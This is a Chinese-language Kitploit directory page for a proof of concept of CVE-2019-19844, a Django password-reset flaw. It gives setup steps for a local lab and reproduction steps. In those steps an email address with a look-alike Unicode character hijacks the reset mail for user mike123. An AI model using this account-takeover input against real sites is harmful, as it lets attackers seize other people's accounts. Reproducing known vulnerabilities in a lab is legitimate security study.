Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
django_cve201919844 — CVE-2019-19844 的 PoC ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ ) | Kitploit
工具/GitHubGitHub/andripwn/django_cve201919844
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubandripwn/django_cve201919844

django_cve201919844

CVE-2019-19844 的 PoC ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )

查看仓库
825年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

django_cve_2019_19844_poc

CVE-2019-19844 的 PoC

要求

  • Python 3.7.x
  • PostgreSQL 9.5 或更高版本

设置

  1. 创建数据库(例如 django_cve_2019_19844_poc)
  2. 将数据库名称设置为环境变量 DJANGO_DATABASE_NAME(例如 export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)
  3. 运行 pip install -r requirements.txt && ./manage.py migrate --noinput
  4. 使用 shell 命令创建以下用户:
root@kitploit:~
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')

复现步骤

  1. 运行 ./manage.py runserver
  2. 打开 http://127.0.0.1:8000/accounts/password-reset/
  3. 输入 mı[email protected](攻击者的邮箱),然后点击发送按钮
  4. 接收邮件(检查控制台),并重置密码
  5. 以 mike123 用户身份登录

邮件

下载工具